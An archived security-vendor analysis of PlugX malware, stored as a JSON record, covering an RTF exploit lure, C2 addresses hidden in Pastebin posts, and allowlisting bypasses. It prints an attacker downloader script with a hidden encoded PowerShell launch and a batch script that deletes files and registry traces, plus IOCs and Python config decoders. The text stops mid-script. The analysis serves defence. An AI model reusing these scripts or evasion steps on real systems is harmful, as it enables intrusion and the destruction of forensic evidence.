{
	"id": "ea0b1e14-8b3b-4cb1-8975-45aaebe69bee",
	"created_at": "2026-04-06T00:09:21.818051Z",
	"updated_at": "2026-04-10T03:21:25.453576Z",
	"deleted_at": null,
	"sha1_hash": "b55a1b9004afc876f13ea36c12dd298dbffdf83d",
	"title": "Paranoid PlugX",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 470201,
	"plain_text": "Paranoid PlugX\r\nBy Tom Lancaster, Esmid Idrizovic\r\nPublished: 2017-06-27 · Archived: 2026-04-05 12:59:59 UTC\r\nThe PlugX malware has a long and extensive history of being used in intrusions as part of targeted attacks. PlugX is still\r\npopular today and its longevity is remarkable. The malware itself is well documented, with multiple excellent papers\r\ncovering most aspects of its functionality. Some of the best write-ups on the malware are cited below:\r\nTR-12 – Analysis of a PlugX malware variant used for targeted attacks. (Circl)\r\nAnalysis of a Recent PlugX Variant - \"P2P PlugX\" (JPCert)\r\nPlugX some uncovered points (Airbus)\r\nPlugX – The Next Generation (Sophos)\r\nGiven this wealth of information in the public domain, PlugX receives a lot of attention from security vendors who put\r\nefforts into providing detection mechanisms for it. Despite this, it remains a tool of choice for many attackers today,\r\nmeaning that if attackers are to be successful in using the malware, they must innovate in the delivery and installation of the\r\nmalware if they are to successfully infect their targets.\r\nThis article discusses a group of PlugX samples which we believe are all used by the same attacker(s), and the measures\r\nthey have taken to attempt to bypass security mechanisms. The targets of these attacks appear to primarily be companies in\r\nthe video games industry, although other targets may exist outside of our telemetry.\r\nSpecifically, we discovered a series of samples using interesting techniques with respect to:\r\nResolution of an initial C2 address\r\nCombining PlugX with open source tools to initially load the malware\r\nAvoiding detection on disk\r\nPalo Alto Networks defends our customers against the samples discussed in this blog in the following ways:\r\nWildfire identifies all files mentioned in this article as Malicious.\r\nTraps 4.0 can be configured to protect the processes that are cited as being abused in this blog from loading malicious\r\ncode.\r\nPalo Alto Networks' AutoFocus customers can track samples related to this blog via the tag:\r\nParanoidPlugX\r\nRelated IOCs are provided in Appendix A of this blog.\r\nAn RTF, an MSI file, a .NET Wrapper and two stages of Shellcode walk into a bar...\r\nOur journey begins with an RTF file named \"New Salary Structure 2017.doc”, which exploits CVE-2017-0199.  The\r\nmechanics of this exploit are already well covered, and as such do not require further discussion here. The document reaches\r\nout to download its initial payload from the following URL:\r\nhxxp://172.104.65[.]97/Office.rtf\r\nThis is a downloader script which attempts to download and execute two payloads, the code is shown below:\r\n\u003cscript\u003e\r\na=new ActiveXObject(\"WScript.Shell\");\r\na.run('%windir%\\\\System32\\\\reg.exe add HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v MSASCuiL2 /t reg_s\r\na.run('%windir%\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -WindowStyle hidden -ep bypass -enc\r\nJABuAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKAEkARQBYACAAJABuAC\r\n0);window.close();\r\n\u003c/script\u003e\r\nThe first payload is a Windows Installer (MSI) file, and dynamic analysis of this file piqued out interest.   We could see the\r\nmalware was PlugX from its actions, yet the C2 address was a pastebin.com URL. Looking at the Pastebin post we expected\r\nto immediately identify a block of text which would later decode to a C2 address, but glancing at the returned content we\r\nwere unable to immediately identify the C2.\r\nhttps://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/\r\nPage 1 of 12\n\nThe second file is a PowerShell script which appears to be based on a Rapid7 Ruby Exploitation script that loads arbitrary\r\nshellcode. In this case, the shellcode is a copy of PlugX and is the same shellcode contained in the MSI file that we will\r\ndissect below.\r\n.NET Wrapper\r\nThe main payload is delivered in a Microsoft .NET Framework file within previously mentioned MSI file. When executed,\r\nthe .NET Framework wrapper will first check if VMware tools is running in background, this is done via a simple process\r\ncheck, searching for any process named “vmtoolsd.” Provided there are no matching processes running, the malware\r\ncontinues execution, creating a registry entry with the name ‘MSASCuiLTasks’ in\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce for persistence. This registry key causes the malware to run\r\nagain each time the system reboots. Next, it will copy the first stage shellcode in memory and create a new thread with the\r\nshellcode running in it, the code responsible for this execution is shown in Figure 1. The shellcode is not encrypted but is\r\nobfuscated.\r\nFigure 1 - The main code from the .NET wrapper, with the Shellcode array being created and executed in a new\r\nthread.\r\nThe first shellcode decrypts a further shellcode block. This second shellcode block in turn, will unpack the main PlugX DLL\r\nin memory using RtlDecompressBuffer. As is typical for PlugX, the header of the final DLL is missing its magic DOS and\r\nNT image headers, which are replaced with XV instead of MZ and PE as shown in Figure 2.\r\nFigure 2 – The decoded DLL payload using the wrong header, XV instead of MZ/PE.\r\nFinally, the second shellcode block will resolve the imports and relocations and jump to the entry point of the DLL.\r\nEncrypted Configuration in shellcode\r\nThe configuration information for the malware, including the C2 information are encrypted in the first shellcode blob and\r\nare passed as an argument to the DllMain function of the main PlugX DLL. This DLL itself also contains a default\r\nconfiguration to connect to the localhost on port 12345. This means  if you extract the DLL manually and execute it then it\r\nwill connect to localhost:12345 rather than the real C2 server, which was passed as an initial argument to the DLL by the\r\nfirst shellcode.\r\nDecrypting the Configuration\r\nAs previously mentioned, the real configuration data is stored in the first stage shellcode but it is not stored in cleartext, but\r\nencrypted and compressed. The configuration data is encrypted with the same algorithm described previously by JPCert but\r\nusing a different XOR value. The versions discussed in the JPCert blog post used 20140918, 353 while the versions we\r\nexamined use XOR values of 20141118, 8389. The same decryption routine is also used for any other string obfuscation or\r\nhttps://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/\r\nPage 2 of 12\n\nfile encryption as required by this sample of PlugX. After decrypting the strings, they must be further decompressed using\r\nLZNT1. For that we can use a Python script, included in Appendix B – Python Scripts.\r\nAfter decrypting and decompressing the strings, we can trivially identify aspects of the PlugX configuration. For example,\r\nwe can see it will inject itself to one these three processes:\r\n%ProgramFiles(x86)%\\Sophos\\AutoUpdate\\ALUpdate.exe\r\n%ProgramFiles(x86)%\\Common Files\\Java\\Java Update\\jusched.exe\r\n%ProgramFiles(x86)%\\Common Files\\Adobe\\ARM\\1.0\\armsvc.exe\r\nThe attempt to inject itself into a process belonging to antivirus product suite is particularly bold.\r\nIn addition to this, the malware queries four PasteBin links to extract the C2 addresses from these links:\r\nhttps://pastebin[.]com/eSsjmhBG\r\nhttps://pastebin[.]com/PSxQd6qw\r\nhttps://pastebin[.]com/CzjM9qwi\r\nhttps://pastebin[.]com/xHDSxxMD\r\nA full list of the extracted strings from the configuration is given in Appendix D – Extracted PlugX Strings.\r\nExtracting C2\r\nPlugX has a feature to extract encrypted C2 configurations from a given URL. In this case, the attackers were creative in\r\nhiding the string in a seemingly legitimate block of text. An example of the content retrieved from Pastebin is given below:\r\n---- BEGIN SSH2 PUBLIC KEY ----\r\nComment: \"rsa-key\"\r\nAAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd\r\n8uV/TJvLsRkjpV+U/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv/mJjQ9Lv3BdNiM3\r\n/KvmlpeJZrrFu2n5UC9=DZKSDAAADOECEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+Ps\r\n8wD4f0NBUtDdEdXhWp3nxv/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJE\r\n2Q/oxLXTrpeJ6AHyLyeUaBha3q9niJ=\r\n---- END SSH2 PUBLIC KEY ----\r\nAt first glanced we missed it, but the paste uses the same technique discussed in this Airbus post. It parses the \"RSA key\"\r\nlooking for magic values \"DZKS\" and \"DZJS\". It then reads and decrypts the content between these values to yield an IP\r\naddress as shown below:\r\n---- BEGIN SSH2 PUBLIC KEY ----\r\nComment: \"rsa-key\"\r\nAAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd\r\n8uV/TJvLsRkjpV+U/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv/mJjQ9Lv3BdNiM3\r\n/KvmlpeJZrrFu2n5UC9=DZKSDAAADOECEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+Ps\r\n8wD4f0NBUtDdEdXhWp3nxv/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJE\r\n2Q/oxLXTrpeJ6AHyLyeUaBha3q9niJ=\r\n---- END SSH2 PUBLIC KEY ----\r\nA Python script to decode strings encrypted with this technique is given in Appendix B – Python Scripts.\r\nAn overview of the whole execution flow for this sample is given in Figure 3.\r\nhttps://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/\r\nPage 3 of 12\n\nFigure 3 - An overview of the execution flow for this sample.\r\nIn all, the attackers have chained together many disparate pieces of code both custom and open source, all in order to load\r\nPlugX. Given the number of components, this would have taken a reasonable amount of time and indicates their dedication\r\nto evading detection whilst continuing to use the same malware.\r\nPivoting to other PlugX samples\r\nBased on our findings above, we identified other examples of interesting PlugX samples. These other examples were\r\nidentified based on similar samples that were sent to the targeted organizations, infrastructure used by the attackers, as well\r\nas unique delivery mechanisms for samples.\r\nParanoid PlugX\r\nOne related series of PlugX samples we examined appeared to be particularly “paranoid” about being detected on disk and\r\nso taking specific anti-forensics steps to defeat being detected on the disk. One example of these samples is given below:\r\nSHA256:6500636c29eba70efd3eb3be1d094dfda4ec6cca52ace23d50e98e6b63308fdb\r\nThe file is a self-extracting RAR, which is a common delivery mechanism for PlugX particularly when the eventual payload\r\nwill be sideloaded by a legitimate executable. In that respect this case is no different, as the eventual payload executed by a\r\nlegitimate signed Microsoft binary which loads the DLL “BlackBox.dll”. However, in order to kick off the execution of the\r\nmalware the attacker uses a batch script which executes the malware, but the batch script does more than simply initiate\r\nexecution of the malware. After running the malware, the batch script goes on to cleans up all signs of its existence on the\r\nsystem, this includes:\r\nDeletion of all initial files created during installation, as well as all associated files required on disk during initial\r\nexecution.\r\nDeletion of all registry keys associated with the extraction of the SFX RAR\r\nDeletion of the User Assist Key entries related to applications that have been recently executed\r\nDeletion of all registry keys relating to services that have recently run\r\nClearly the attacker using this PlugX is paranoid about it being detected on disk, both in the registry and the file system. To\r\ntop this off the script runs most of the deletion commands more than once.\r\nThe result is that there should be no evidence that the malware was ever executed on the disk, making it harder for forensics\r\nteams to identify how the malware got there, and meaning that memory or network based detection would be required to\r\nidentify the intrusion. The full contents of the batch script are given in Appendix C – a.bat.\r\nhttps://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/\r\nPage 4 of 12\n\nThe power of open source \u0026 PlugX\r\nIn the first half of 2017, we saw attackers begin to improve upon this “Paranoid” version of PlugX – it wasn’t enough to be\r\nin memory-only after getting infecting the system, the attackers also wanted to bypass application allowlisting techniques in\r\nuse by network defenders. To this end, they began incorporating open source techniques, in particular those that have been\r\nassembled in a list authored by the GitHub user SubTee. For example, the following sample loads the malware as shellcode\r\nwithin a .NET Framework project using msbuild.exe, effectively bypassing application allowlisting techniques:\r\nSHA256: 822b313315138a69fc3e3f270f427c02c4215088c214dfaf8ecb460a5418c5f3\r\nThis sample approximately follows the GIST published here, but has additional code which appears to be custom to our\r\nattacker which acts as a helper to load the shellcode. The shellcode is, as in our first example, another PlugX payload.\r\nIn another case the attackers use another code snippet borrowed from the SubTee GitHub project, this time filling in a fully\r\ntemplated .NET application allowlist bypass file:\r\nSHA256: 3e9136f95fa55852993cd15b82fe6ec54f78f34584f7689b512a46f0a22907f2:\r\nThis time the attacker didn't have to write any of their own code, instead they were simply able to paste their shellcode\r\ndirectly into a template, in order to launch PlugX as a child process of a trusted application.\r\nConclusions \u0026 Mitigations\r\nWhile PlugX has been well understood by the security community for years, attackers continue to use the malware. Some\r\npossible reasons for this continued use include:\r\nThe operators of the malware are familiar and comfortable with the existing malware, meaning they are reluctant to\r\nchange.\r\nThough competent at packaging PlugX in different ways, the attackers would struggle to write a fully featured\r\nmalware like PlugX.\r\nThe effort required to rebuild a malware as complex as PlugX is not worth the effort when they can bypass defenses\r\nwithout doing so.\r\nIn all likelihood, a combination of these three factors is behind the continued prevalence of the malware. Many PlugX\r\nattackers continue to use relatively mundane techniques to load the malware, making it easy for defenders to identify and\r\nprevent execution of the malware, but others continue to apply new and interesting techniques to evade detection.\r\nIn particular, this set of attackers have made good use of open source tools to package the malware, and show some skill in\r\nwriting their own wrapper applications to execute payloads. Many in the security industry would be quick to recommend\r\napplication whitelisting as one of the most effective way to reduce the success rate of attacks, however by applying publicly\r\navailable techniques it is possible to bypass these controls.\r\nFor organizations relying on Application Whitelisting, SubTee’s blog makes a series of recommendations which help prevent\r\nthese bypass techniques. In addition to these mitigations, the Traps 4.0 can be configured to protect the .NET processes\r\nwhich can be abused in this manner.\r\nAppendix A - Related IoCs\r\nDirectly related:\r\n45.248.84[.]7\r\n172.104.65[.]97\r\nSHA256 Comments\r\n5909c1dcfb3270b2b057513561b2ab1613687a0af0072c51244ff005b113888b PlugX\r\n6804be0689bbfbb180bb384ebc316f50cb87e65553d0c3597d6e9b6b6dd8dd3f PlugX\r\n8ea275eee557037ab6626d15c0107bdcf20b45a8307a0dc3baa85d49acc94331 PlugX\r\ne6020eb997715c4f627b6e6a16947861bce310aa31fcf58448a5beba11626d36 PlugX\r\n4554aa6c2fdd58dfddebdb786c5d23cd6277025ab0355ffb5d8967c3976e8659 PlugX\r\n3817388a983d5ee1604a8eec621b5eb251cb8bdeab9c8591fe5e8c90cd99ed49 CVE-2017-0199\r\n45513f942b217def56a1eac82a4b5edca65ebdd5e36c7a8751bf0350d5ebea39 CVE-2017-0199\r\n64d7d4846c5dd00a7271fe8a83aebe4317d06abad84d44ffd6f42b1004704bd5 PlugX\r\n07d94726a1ae764fa5322531f29fe80f0246dd40b4d052c98f269987a3ee4515 PowerShell PlugX\r\nhttps://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/\r\nPage 5 of 12\n\n4622f8357846f7a0bea3ce453bb068b443e21359203dfa2f74301c7a79a408c2\r\nDownloader for PS PlugX ++ MSI\r\nPlugX\r\n49baf12f50fec772fdfe56c49005efb306b72a312a7dbdad98066029a191bfaf CVE-2017-0199\r\nhttps://pastebin[.]com/eSsjmhBG\r\nhttps://pastebin[.]com/PSxQd6qw\r\nhttps://pastebin[.]com/CzjM9qwi\r\nhttps://pastebin[.]com/xHDSxxMD\r\nInferred relation via similar targeting\r\nSHA256 Family\r\n6e5864faf4312bf3787e79e432c1acacf2a699ecb5b797cac56e62ed0a8e965c Idicaf\r\n6b455714664a65e2a4af61b11d141467f4554e215e3ebd02e8f3876d8aa31954 Idicaf\r\ndf58962a3a065f1587f543a501d0e3f0ca05ebac51fc35d4bb4669d8eac9d8c1 Idicaf\r\n52fee36c647ca799e21cd75db1f425ccf632b28c27e67b8578ff6dd30ca62af7 Idicaf\r\n90e45c7b3798433199d6d917a4847a409dbdc101b210d9798f8c78ee43abf6d8 Idicaf\r\n5ff788efd079eb2987b03d98e0c8211ac97ae6479274bade36a170b5a396f72b Idicaf\r\n535abe8cd436d6b635c5687db0ae8d47c7c3679e4f5e2b4d629276b41fca0578 Idicaf\r\nef85896426a0a558ab17346a67f108045d142a2d2a21f7702bfb8be50542726d Idicaf\r\nd41e2bbc8ea10dd7543d5f4cb02983e2b1ad5d47cc3ce5fa95189501c019fdac Idicaf\r\n208bd18054134909e2ad680c0096477c48a58e8754a9439002e6523f71e66d47 PlugX\r\n3e9136f95fa55852993cd15b82fe6ec54f78f34584f7689b512a46f0a22907f2 PlugX\r\n5deab61f83e9afe13a79930eda1bdcb6c867042a1ce0e5c44e4209a60ab3327d PlugX\r\n6500636c29eba70efd3eb3be1d094dfda4ec6cca52ace23d50e98e6b63308fdb PlugX\r\n8e07c7636be935e0a6184db8a85fd8b607e6c48bb07d34d0138432f7c697bc99 PlugX\r\nDomains:\r\nkbklxpb.imshop.in\r\nserupdate.wicp.net\r\nmsfcnsoft.com\r\nmicros0ff.com\r\nmsfcnsoft.com\r\nmicrosoff.net\r\nmsffncsi.com\r\nA781195.gicp.net\r\nupgradsource.com\r\nB781195.vicp.net\r\nkbklxp.eicp.net\r\nAppendix B – Python Scripts\r\nLZNT1 decrypt script, only works with Windows.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\nimport ctypes\r\nfrom ctypes import *\r\nwith open('mysettings.bin','rb') as f:\r\n    buffer = f.read()\r\nuncompressed_size = len(buffer) * 16\r\nuncompressed = create_string_buffer(uncompressed_size)\r\nFinalUncompressedSize = c_ulong(0)\r\nhttps://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/\r\nPage 6 of 12\n\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\nnt = windll.ntdll\r\n# COMPRESSION_FORMAT_LZNT1 = 2\r\nres = nt.RtlDecompressBuffer(2, uncompressed, uncompressed_size, buffer, len(buffer),\r\nbyref(FinalUncompressedSize))\r\nif (res == 0):\r\n    uncompressed = uncompressed[0:FinalUncompressedSize.value]    \r\nDecoding the PlugX configuration:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\ndef plugx_decode(data):\r\n    decode_key = struct.unpack_from('\u003cI', data, 0)[0]\r\n    out = ''\r\n    # XOR Values might possibly be varied.\r\n    key1 = decode_key ^ 20141118\r\n    key2 = decode_key ^ 8389\r\n    for c in data[4:]:\r\n        # ADD/SUB Values might possibly be varied.\r\n        key1 += 3373\r\n        key2 -= 39779\r\n        dec = ord(c) ^ (((key2 \u003e\u003e 16) \u0026 0xff ^ ((key2 \u0026 0xff ^ (((key1 \u003e\u003e 16) \u0026 0xff ^ (key1 - (key1 \u003e\u003e 8) \u0026 0xff))\r\n- (key1 \u003e\u003e 24) \u0026 0xff)) - (key2 \u003e\u003e 8) \u0026 0xff)) - (key2 \u003e\u003e 24) \u0026 0xff)\r\n        out = out + chr(dec)\r\n    return out\r\nDecoding the C2 addresses from Pastebin:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\nimport struct\r\ndef decode(buf):\r\n    res = \"\"\r\n    for i in range(0, len(buf) -1, 2):\r\n        dl = ord(buf[i + 1])\r\n        dl = dl - 0x41\r\n        dl = dl * 0x10\r\n        dl = dl + ord(buf[i])\r\nhttps://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/\r\nPage 7 of 12\n\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n        dl = dl - 0x41\r\n        res += chr(dl)\r\n    return res\r\ndef decode_plugx_pastebin(buf):\r\n    start = buf.find('DZKS')\r\n    if start == -1:\r\n        return None\r\n    end = buf.find('DZJS', start + 4)\r\n    if end == -1:\r\n        return None\r\n    start += 4\r\n    data = buf[start:end]\r\n    decoded = decode(data)\r\n    connection_type = struct.unpack_from('\u0026lt;H', decoded, 0)[0]\r\n    port = struct.unpack_from('\u0026lt;H', decoded, 2)[0]\r\n    ip = decoded[4:]\r\n    print \"Decoded IP: {}:{}, type: {}\".format(ip, port, connection_type)\r\n    return True\r\ndecode_plugx_pastebin('AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd8uV/TJvLsRkjpV+U/tMiM\r\ndecode_plugx_pastebin('AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd8uV/TJvLsRkjpV+U/tMiM\r\ndecode_plugx_pastebin('AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd8uV/TJvLsRkjpV+U/tMiM\r\ndecode_plugx_pastebin('AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd8uV/TJvLsRkjpV+U/tMiM\r\nAppendix C – a.bat\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\nmscorsvw.exe\r\ncscript del.vbs\r\ndel BlackBox.dll\r\ndel mscorsvw.exe\r\ndel BlackBox\r\ndel explorer.exe\r\ncscript del.vbs\r\nhttps://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/\r\nPage 8 of 12\n\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n40\r\n41\r\n42\r\n43\r\n44\r\n45\r\n46\r\ndel %sfxcmd%\r\ndel mscorsvw.exe\r\ndel BlackBox.dll\r\ndel BlackBox\r\ndel explorer.exe\r\ndel del.vbs\r\ndel a.bat\r\ndel %sfxcmd%\r\ndel mscorsvw.exe\r\ndel BlackBox.dll\r\ndel BlackBox\r\ndel explorer.exe\r\ndel del.vbs\r\ndel a.bat\r\nreg delete \"HKLM\\SYSTEM\\ControlSet001\\services\\emproxy\" /f\r\nreg delete \"HKLM\\SYSTEM\\ControlSet002\\services\\emproxy\" /f\r\nreg delete \"HKLM\\SYSTEM\\CurrentControlSet\\services\\emproxy\" /f\r\nreg delete \"HKLM\\SYSTEM\\ControlSet001\\services\\EmpPrx\" /f\r\nreg delete \"HKLM\\SYSTEM\\ControlSet002\\services\\EmpPrx\" /f\r\nreg delete \"HKLM\\SYSTEM\\CurrentControlSet\\services\\EmpPrx\" /f\r\nreg delete \"HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\svchost_RASAPI32\" /f\r\nreg delete \"HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\svchost_RASMANCS\" /f\r\nreg delete \"HKU\\.DEFAULT\\Software\\WinRAR SFX\" /f\r\nreg delete \"HKU\\S-1-5-18\\Software\\WinRAR SFX\" /f\r\nreg delete \"HKU\\S-1-5-18\\Software\\Microsoft\\Windows Script Host\" /f\r\nreg delete \"HKU\\S-1-5-18\\Software\\Microsoft\\Windows Script Host\\Settings\" /f\r\nreg delete \"HKU\\S-1-5-18\\Software\\WinRAR SFX\" /f\r\nreg delete \"HKU\\S-1-5-18\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\P:\\Hfref\\Nqzvavfgengbe\\Qbjaybnqf\\fipubfg\\fipubfg.rkr\" /f\r\nreg delete \"HKU\\S-1-5-18\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\\pzq.rkr\" /f\r\nreg delete \"HKU\\S-1-5-18\\Software\\WinRAR SFX\\C%%Users%ADMINI~1%AppData%Local%Temp\" /f\r\nreg delete \"HKU\\S-1-5-18\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA\" /f\r\nreg delete \"HKU\\S-1-5-18\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\\rkcybere.rkr\" /f\r\nreg delete \"HKU\\S-1-5-18\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-\r\n9926F41749EA}\\Count\\P:\\Hfref\\Nqzvavfgengbe\\Qbjaybnqf\\ErtfubgCbegnoyr\\Ncc\\ertfubg\\ertfubg_k64.rkr\" /f\r\nreg delete \"HKU\\S-1-5-18\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet\r\nSettings\\Connections\\SavedLegacySettings\" /f\r\nreg delete \"HKU\\S-1-5-19\\Software\\WinRAR SFX\" /f\r\nhttps://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/\r\nPage 9 of 12\n\n47\r\n48\r\n49\r\n50\r\n51\r\n52\r\n53\r\n54\r\n55\r\n56\r\n57\r\n58\r\n59\r\n60\r\n61\r\n62\r\n63\r\n64\r\n65\r\n66\r\n67\r\n68\r\n69\r\n70\r\n71\r\n72\r\n73\r\n74\r\n75\r\n76\r\n77\r\n78\r\n79\r\n80\r\n81\r\n82\r\n83\r\n84\r\n85\r\nreg delete \"HKU\\S-1-5-19\\Software\\Microsoft\\Windows Script Host\" /f\r\nreg delete \"HKU\\S-1-5-19\\Software\\Microsoft\\Windows Script Host\\Settings\" /f\r\nreg delete \"HKU\\S-1-5-19\\Software\\WinRAR SFX\" /f\r\nreg delete \"HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\P:\\Hfref\\Nqzvavfgengbe\\Qbjaybnqf\\fipubfg\\fipubfg.rkr\" /f\r\nreg delete \"HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\\pzq.rkr\" /f\r\nreg delete \"HKU\\S-1-5-19\\Software\\WinRAR SFX\\C%%Users%ADMINI~1%AppData%Local%Temp\" /f\r\nreg delete \"HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA\" /f\r\nreg delete \"HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\\rkcybere.rkr\" /f\r\nreg delete \"HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-\r\n9926F41749EA}\\Count\\P:\\Hfref\\Nqzvavfgengbe\\Qbjaybnqf\\ErtfubgCbegnoyr\\Ncc\\ertfubg\\ertfubg_k64.rkr\" /f\r\nreg delete \"HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet\r\nSettings\\Connections\\SavedLegacySettings\" /f\r\nreg delete \"HKU\\S-1-5-20\\Software\\WinRAR SFX\" /f\r\nreg delete \"HKU\\S-1-5-20\\Software\\Microsoft\\Windows Script Host\" /f\r\nreg delete \"HKU\\S-1-5-20\\Software\\Microsoft\\Windows Script Host\\Settings\" /f\r\nreg delete \"HKU\\S-1-5-20\\Software\\WinRAR SFX\" /f\r\nreg delete \"HKU\\S-1-5-20\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\P:\\Hfref\\Nqzvavfgengbe\\Qbjaybnqf\\fipubfg\\fipubfg.rkr\" /f\r\nreg delete \"HKU\\S-1-5-20\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\\pzq.rkr\" /f\r\nreg delete \"HKU\\S-1-5-20\\Software\\WinRAR SFX\\C%%Users%ADMINI~1%AppData%Local%Temp\" /f\r\nreg delete \"HKU\\S-1-5-20\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA\" /f\r\nreg delete \"HKU\\S-1-5-20\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\\rkcybere.rkr\" /f\r\nreg delete \"HKU\\S-1-5-20\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-\r\n9926F41749EA}\\Count\\P:\\Hfref\\Nqzvavfgengbe\\Qbjaybnqf\\ErtfubgCbegnoyr\\Ncc\\ertfubg\\ertfubg_k64.rkr\" /f\r\nreg delete \"HKU\\S-1-5-20\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet\r\nSettings\\Connections\\SavedLegacySettings\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643\\Software\\WinRAR SFX\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643\\Software\\Microsoft\\Windows Script Host\"\r\n/f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643\\Software\\Microsoft\\Windows Script\r\nHost\\Settings\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643\\Software\\WinRAR SFX\" /f\r\nreg delete 